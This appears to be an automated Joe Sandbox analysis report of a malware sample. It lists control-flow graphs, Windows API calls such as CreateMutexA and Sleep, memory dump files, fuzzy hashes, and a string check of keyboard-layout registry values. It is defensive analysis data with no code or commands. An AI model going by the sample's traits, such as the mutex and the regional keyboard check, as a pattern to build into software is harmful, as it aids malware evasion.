                                                                                                                control_flow_graph 1268 d5735a-d57366 1269 d5737c-d5739e call d6d663 1268->1269 1270 d57368-d57376 1268->1270 1276 d573a0-d573ac 1269->1276 1277 d573c8-d573e0 1269->1277 1270->1269 1272 d5741c-d574db call d86c6a call d67a00 * 6 call d572b0 1270->1272 1302 d574dd-d574e9 1272->1302 1303 d57509-d5750f 1272->1303 1279 d573be-d573c5 call d6d663 1276->1279 1280 d573ae-d573bc 1276->1280 1281 d573e2-d573ee 1277->1281 1282 d5740a-d5741b 1277->1282 1279->1277 1280->1272 1280->1279 1285 d57400-d57407 call d6d663 1281->1285 1286 d573f0-d573fe 1281->1286 1285->1282 1286->1272 1286->1285 1304 d574ff-d57506 call d6d663 1302->1304 1305 d574eb-d574f9 1302->1305 1306 d57511-d5751d 1303->1306 1307 d57539-d5753f 1303->1307 1304->1303 1305->1304 1308 d57587-d575e1 call d86c6a 1305->1308 1310 d5752f-d57536 call d6d663 1306->1310 1311 d5751f-d5752d 1306->1311 1312 d57541-d5754d 1307->1312 1313 d57569-d57584 call d6cff1 1307->1313 1326 d57661-d576d7 call d680c0 * 3 1308->1326 1327 d575e3-d575f7 call d6d111 1308->1327 1310->1307 1311->1308 1311->1310 1318 d5755f-d57566 call d6d663 1312->1318 1319 d5754f-d5755d 1312->1319 1318->1313 1319->1308 1319->1318 1343 d57705-d5771d 1326->1343 1344 d576d9-d576e5 1326->1344 1327->1326 1333 d575f9-d5765e call d6d64e call d6d0c7 1327->1333 1333->1326 1345 d57747-d5775f 1343->1345 1346 d5771f-d5772b 1343->1346 1347 d576e7-d576f5 1344->1347 1348 d576fb-d57702 call d6d663 1344->1348 1351 d57761-d5776d 1345->1351 1352 d57789-d5779a 1345->1352 1349 d5773d-d57744 call d6d663 1346->1349 1350 d5772d-d5773b 1346->1350 1347->1348 1353 d5779b-d57933 call d86c6a call d68680 call d68320 call d67a00 * 2 call d55c10 call d680c0 call d572b0 1347->1353 1348->1343 1349->1345 1350->1349 1350->1353 1356 d5777f-d57786 call d6d663 1351->1356 1357 d5776f-d5777d 1351->1357 1382 d57935-d57941 1353->1382 1383 d5795d-d57979 call d6cff1 1353->1383 1356->1352 1357->1353 1357->1356 1385 d57953-d5795a call d6d663 1382->1385 1386 d57943-d57951 1382->1386 1385->1383 1386->1385 1388 d5797f-d57a85 call d86c6a call d67a00 call d55c10 call d68320 call d67a00 call d55c10 call d680c0 call d572b0 1386->1388 1410 d57a87-d57a93 1388->1410 1411 d57aaf-d57ac8 call d6cff1 1388->1411 1412 d57aa5-d57aac call d6d663 1410->1412 1413 d57a95-d57aa3 1410->1413 1412->1411 1413->1412 1415 d57ace-d57cd4 call d86c6a call d56d70 call d67a00 call d55c10 call d67a00 call d55c10 call d68320 call d68220 call d67a00 call d55c10 call d680c0 call d572b0 1413->1415 1449 d57cd6-d57ce2 1415->1449 1450 d57cfe-d57d17 call d6cff1 1415->1450 1451 d57cf4-d57cfb call d6d663 1449->1451 1452 d57ce4-d57cf2 1449->1452 1451->1450 1452->1451 1454 d57d22-d57d27 call d86c6a 1452->1454
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ConditionVariableWake
                                                                                                                • String ID:
                                                                                                                • API String ID: 1192502693-0
                                                                                                                • Opcode ID: 52c3e671c7df4ad3ae9bb151ee66a587b7fc0285729e64ac81cd53fc1b5e6c58
                                                                                                                • Instruction ID: 53cb11242b545f4d873ba7665c75e48078823b2e8a7a21c787e4e2ae5ca1903d
                                                                                                                • Opcode Fuzzy Hash: 52c3e671c7df4ad3ae9bb151ee66a587b7fc0285729e64ac81cd53fc1b5e6c58
                                                                                                                • Instruction Fuzzy Hash: 88725871A14248DBDF08EF68DC86B9DBBA6EB45314F604258FC05973C1DB359A88CBB1
                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,?,00D8652A,?,?,?,?,?,00D87661), ref: 00D86567
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 970e625d868624031d47bd55351d9fad9da3fb05b5d6c7a1acee11dfe2af97cc
                                                                                                                • Instruction ID: fbee776a9f6958159392b9a6ef17232b3615d272f057585b897e26bb4672e850
                                                                                                                • Opcode Fuzzy Hash: 970e625d868624031d47bd55351d9fad9da3fb05b5d6c7a1acee11dfe2af97cc
                                                                                                                • Instruction Fuzzy Hash: 7AE08C30000108AECF297B18CC4DA4C3B6AEF01761F540840F9095A222CB25ED82C7A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 00d77a01e17754021ae4601e25741fa80a067985cad3b2541c7c52b305b2885c
                                                                                                                • Instruction ID: 6a332a991ae85349844e671b7033ea390c329f37011cec6ba06930a1f4caea18
                                                                                                                • Opcode Fuzzy Hash: 00d77a01e17754021ae4601e25741fa80a067985cad3b2541c7c52b305b2885c
                                                                                                                • Instruction Fuzzy Hash: 67112CA700C114ADE702C446AA1F5F7677BE6CA7307308617F80BC6562D3A1494B5171
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                • API String ID: 0-3963862150
                                                                                                                • Opcode ID: 6e46406fcd71323ca1eef6574db1764928f1db5a22868f62e0e50198363e856e
                                                                                                                • Instruction ID: 19697803a2e13e3ca37c8d593f8d0e8f75560cf7ef9e7e724b5110e4f803b7e3
                                                                                                                • Opcode Fuzzy Hash: 6e46406fcd71323ca1eef6574db1764928f1db5a22868f62e0e50198363e856e
                                                                                                                • Instruction Fuzzy Hash: EDF1D171A002589FDF24DF58CC85BDEBBB9EF45304F504699F908A72C1DB749A88CBA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 917 d59ba5-d59d91 call d67a00 call d55c10 call d58b30 call d68220
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: 1cfbbcbbcb25b9827f5b920d6b432201a84d06d757fdfe646d1551a38d733f9a
                                                                                                                • Instruction ID: 5c880569203ce0d49f4a155176a14852820c84722b97c53e5585ea5237774304
                                                                                                                • Opcode Fuzzy Hash: 1cfbbcbbcb25b9827f5b920d6b432201a84d06d757fdfe646d1551a38d733f9a
                                                                                                                • Instruction Fuzzy Hash: E6312371A04204CBEF18DB6CDC9976DFBA2EB86311F248318EC149B3D5C77589888B72

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 939 d59f44-d59f64 943 d59f66-d59f72 939->943 944 d59f92-d59fae 939->944 945 d59f74-d59f82 943->945 946 d59f88-d59f8f call d6d663 943->946 947 d59fb0-d59fbc 944->947 948 d59fdc-d59ffb 944->948 945->946 949 d5a92b 945->949 946->944 951 d59fd2-d59fd9 call d6d663 947->951 952 d59fbe-d59fcc 947->952 953 d59ffd-d5a009 948->953 954 d5a029-d5a916 call d680c0 948->954 956 d5a953-d5a994 Sleep CreateMutexA 949->956 957 d5a92b call d86c6a 949->957 951->948 952->949 952->951 960 d5a01f-d5a026 call d6d663 953->960 961 d5a00b-d5a019 953->961 969 d5a9a7-d5a9a8 956->969 970 d5a996-d5a998 956->970 957->956 960->954 961->949 961->960 970->969 971 d5a99a-d5a9a5 970->971 971->969
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
